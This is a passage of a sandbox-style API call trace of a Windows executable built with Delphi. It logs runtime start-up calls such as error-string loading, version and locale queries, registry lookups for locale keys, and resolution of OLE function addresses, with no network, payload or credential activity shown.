uID=0xffd2, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0073.792] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0073.793] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0073.793] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0073.793] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0073.793] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0073.793] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0073.793] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0073.793] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x19dbe4, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0073.794] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x19dbdc, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0073.794] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x19dbdc, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0073.794] GetVersionExW (in: lpVersionInformation=0x19faf0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19faf0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0073.794] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75130000 [0073.794] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2a8a38 [0073.795] GetProcAddress (hModule=0x75130000, lpProcName="GetNativeSystemInfo") returned 0x7514a410 [0073.795] GetNativeSystemInfo (in: lpSystemInfo=0x19facc | out: lpSystemInfo=0x19facc*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0073.795] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x8 [0073.795] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x2, dwlConditionMask=0x8 | out: lpVersionInformation=0x19f970) returned 1 [0073.795] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x1) returned 0x1 [0073.795] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x1, dwlConditionMask=0x1 | out: lpVersionInformation=0x19f970) returned 0 [0073.795] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x1, dwlConditionMask=0x1 | out: lpVersionInformation=0x19f970) returned 0 [0073.795] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x1, dwlConditionMask=0x1 | out: lpVersionInformation=0x19f970) returned 1 [0073.795] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x20) returned 0x8000 [0073.795] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x20, dwlConditionMask=0x8000 | out: lpVersionInformation=0x19f970) returned 1 [0073.795] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x10) returned 0x1000 [0073.795] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x10, dwlConditionMask=0x1000 | out: lpVersionInformation=0x19f970) returned 1 [0073.795] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x4) returned 0x40 [0073.795] VerifyVersionInfoW (in: lpVersionInformation=0x19f970, dwTypeMask=0x4, dwlConditionMask=0x40 | out: lpVersionInformation=0x19f970) returned 1 [0073.795] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x19dab0, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0073.795] LoadStringW (in: hInstance=0x400000, uID=0xff53, lpBuffer=0x19dab0, cchBufferMax=4096 | out: lpBuffer="Windows 8") returned 0x9 [0073.795] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0073.796] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0073.796] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0073.796] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0073.796] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0073.796] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0073.796] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x19dbd4, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0073.796] GetVersionExW (in: lpVersionInformation=0x19fae4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x02") | out: lpVersionInformation=0x19fae4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0073.796] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0073.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0073.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x1fc80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0073.797] GetProcAddress (hModule=0x75130000, lpProcName="GetDiskFreeSpaceExW") returned 0x751562d0 [0073.797] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f9ba, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0073.797] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0073.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0073.797] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0073.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0073.797] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0073.797] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fbc8 | out: phkResult=0x19fbc8*=0x0) returned 0x2 [0073.797] GetThreadLocale () returned 0x409 [0073.797] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x19fb00 | out: lpCPInfo=0x19fb00) returned 1 [0073.798] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0073.798] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0073.798] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0073.798] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0073.799] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x19fa60 | out: Buffer=0x0, ReturnedLength=0x19fa60) returned 0 [0073.799] GetLastError () returned 0x7a [0073.799] GetLogicalProcessorInformation (in: Buffer=0x1fb99d0, ReturnedLength=0x19fa60 | out: Buffer=0x1fb99d0, ReturnedLength=0x19fa60) returned 1 [0073.799] GetCurrentThreadId () returned 0x360 [0073.799] GetCurrentThreadId () returned 0x360 [0073.799] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x19f868, cchData=256 | out: lpLCData="2") returned 2 [0073.800] GetThreadLocale () returned 0x409 [0073.800] EnumCalendarInfoW (lpCalInfoEnumProc=0x4205a0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0073.814] GetThreadLocale () returned 0x409 [0073.814] EnumCalendarInfoW (lpCalInfoEnumProc=0x420644, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0073.814] GetCurrentThreadId () returned 0x360 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x19f864, cchData=256 | out: lpLCData="Sun") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x19f864, cchData=256 | out: lpLCData="Sunday") returned 7 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x19f864, cchData=256 | out: lpLCData="Mon") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x19f864, cchData=256 | out: lpLCData="Monday") returned 7 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x19f864, cchData=256 | out: lpLCData="Tue") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x19f864, cchData=256 | out: lpLCData="Tuesday") returned 8 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x19f864, cchData=256 | out: lpLCData="Wed") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x19f864, cchData=256 | out: lpLCData="Wednesday") returned 10 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x19f864, cchData=256 | out: lpLCData="Thu") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x19f864, cchData=256 | out: lpLCData="Thursday") returned 9 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x19f864, cchData=256 | out: lpLCData="Fri") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x19f864, cchData=256 | out: lpLCData="Friday") returned 7 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x19f864, cchData=256 | out: lpLCData="Sat") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x19f864, cchData=256 | out: lpLCData="Saturday") returned 9 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x19f868, cchData=256 | out: lpLCData="Jan") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x19f868, cchData=256 | out: lpLCData="January") returned 8 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x19f868, cchData=256 | out: lpLCData="Feb") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x19f868, cchData=256 | out: lpLCData="February") returned 9 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x19f868, cchData=256 | out: lpLCData="Mar") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x19f868, cchData=256 | out: lpLCData="March") returned 6 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x19f868, cchData=256 | out: lpLCData="Apr") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x19f868, cchData=256 | out: lpLCData="April") returned 6 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x19f868, cchData=256 | out: lpLCData="May") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x19f868, cchData=256 | out: lpLCData="May") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x19f868, cchData=256 | out: lpLCData="Jun") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x19f868, cchData=256 | out: lpLCData="June") returned 5 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x19f868, cchData=256 | out: lpLCData="Jul") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x19f868, cchData=256 | out: lpLCData="July") returned 5 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x19f868, cchData=256 | out: lpLCData="Aug") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x19f868, cchData=256 | out: lpLCData="August") returned 7 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x19f868, cchData=256 | out: lpLCData="Sep") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x19f868, cchData=256 | out: lpLCData="September") returned 10 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x19f868, cchData=256 | out: lpLCData="Oct") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x19f868, cchData=256 | out: lpLCData="October") returned 8 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x19f868, cchData=256 | out: lpLCData="Nov") returned 4 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x19f868, cchData=256 | out: lpLCData="November") returned 9 [0073.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x19f868, cchData=256 | out: lpLCData="Dec") returned 4 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x19f868, cchData=256 | out: lpLCData="December") returned 9 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="$") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x19fab0, cchData=2 | out: lpLCData=",") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x19fab0, cchData=2 | out: lpLCData=".") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="2") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x19fab0, cchData=2 | out: lpLCData="/") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x19f870, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f870, cchData=256 | out: lpLCData="1") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x19f870, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f870, cchData=256 | out: lpLCData="1") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x19fab0, cchData=2 | out: lpLCData=":") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="AM") returned 3 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="PM") returned 3 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x19f8b8, cchData=256 | out: lpLCData="0") returned 2 [0073.816] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x19fab0, cchData=2 | out: lpLCData=",") returned 2 [0073.816] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76ce0000 [0073.817] GetProcAddress (hModule=0x76ce0000, lpProcName="VariantChangeTypeEx") returned 0x76cf7e70 [0073.817] GetProcAddress (hModule=0x76ce0000, lpProcName="VarNeg") returned 0x76d40400 [0073.817] GetProcAddress (hModule=0x76ce0000, lpProcName="VarNot") returned 0x76d41670 [0073.817] GetProcAddress (hModule=0x76ce0000, lpProcName="VarAdd") returned 0x76d18460 [0073.817] GetProcAddress (hModule=0x76ce0000, lpProcName="VarSub") returned 0x76d19960 [0073.817] GetProcAddress (hModule=0x76ce0000, lpProcName="VarMul") returned 0x76d19090 [0073.817] GetProcAddress (hModule=0x76ce0000, lpProcName="VarDiv") returned 0x76d40910 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarIdiv") returned 0x76d412b0 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarMod") returned 0x76d41510 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarAnd") returned 0x76d0f9d0 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarOr") returned 0x76d41720 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarXor") returned 0x76d418c0 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarCmp") returned 0x76d04040 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarI4FromStr") returned 0x76d04b50 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarR4FromStr") returned 0x76d0f4c0 [0073.818] GetProcAddress (hModule=0x76ce0000, lpProcName="VarR8FromStr") returned 0x76d11740 [0073.819] GetProcAddress (hModule=0x76ce0000, lpProcName="VarDateFromStr") returned 0x76d05a80 [0073.819] GetProcAddress (hModule=0x76ce0000, lpProcName="VarCyFromStr") returned 0x76d42e50 [0073.819] GetProcAddress (hModule=0x76ce0000, lpProcName="VarBoolFromStr") returned 0x76d020d0 [0073.819] GetProcAddress (hModule=0x76ce0000, lpProcName="VarBstrFromCy") returned 0x76d05240 [0073.819] GetProcAddress (hModule=0x76ce0000, lpProcName="VarBstrFromDate") returned 0x76d05420 [0073.819] GetProcAddress (hModule=0x76ce0000, lpProcName="VarBstrFromBool") returned 0x76d02080 [0073.820] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1dc [0073.821] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1e0 [0073.821] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1e4 [0073.833] QueryPerformanceCounter (in: lpPerformanceCount=0x19fbd8 | out: lpPerformanceCount=0x19fbd8*=12129535894) returned 1 [0073.833] GetTickCount () returned 0x1d9a2 [0073.833] GetLocalTime (in: lpSystemTime=0x19fbd0 | out: lpSystemTime=0x19fbd0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x4, wSecond=0x32, wMilliseconds=0x1c9)) [0073.833] GetLocalTime (in: lpSystemTime=0x19fbd0 | out: lpSystemTime=0x19fbd0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x4, wSecond=0x32, wMilliseconds=0x1c9)) [0073.833] QueryPerformanceCounter (in: lpPerformanceCount=0x19fbd8 | out: lpPerformanceCount=0x19fbd8*=12129578225) returned 1 [0073.833] GetTickCount () returned 0x1d9a2 [0073.833] GetLocalTime (in: lpSystemTime=0x19fbd0 | out: lpSystemTime=0x19fbd0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x4, wSecond=0x32, wMilliseconds=0x1c9)) [0073.833] GetLocalTime (in: lpSystemTime=0x19fbd0 | out: lpSystemTime=0x19fbd0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x4, wSecond=0x32, wMilliseconds=0x1c9)) [0073.834] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76f30000 [0073.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0073.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x1fc82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0073.834] GetProcAddress (hModule=0x76f30000, lpProcName="CoCreateInstanceEx") returned 0x7503baf0 [0073.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0073.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x1fb288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0073.834] GetProcAddress (hModule=0x76f30000, lpProcName="CoInitializeEx") returned 0x74fdcd50 [0073.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0073.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x1fc82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0073.834] GetProcAddress (hModule=0x76f30000, lpProcName="CoAddRefServerProcess") returned 0x7503d120 [0073.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0073.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x1fc82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0073.835] GetProcAddress (hModule=0x76f30000, lpProcName="CoReleaseServerProcess") returned 0x75041970 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x1fc82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0073.835] GetProcAddress (hModule=0x76f30000, lpProcName="CoResumeClassObjects") returned 0x75046640 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x1fc82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0073.835] GetProcAddress (hModule=0x76f30000, lpProcName="CoSuspendClassObjects") returned 0x74fb1f60 [0073.835] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x1fcf45c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0073.835] GetProcAddress (hModule=0x75130000, lpProcName="InitializeConditionVariable") returned 0x779e9da0 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0073.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, 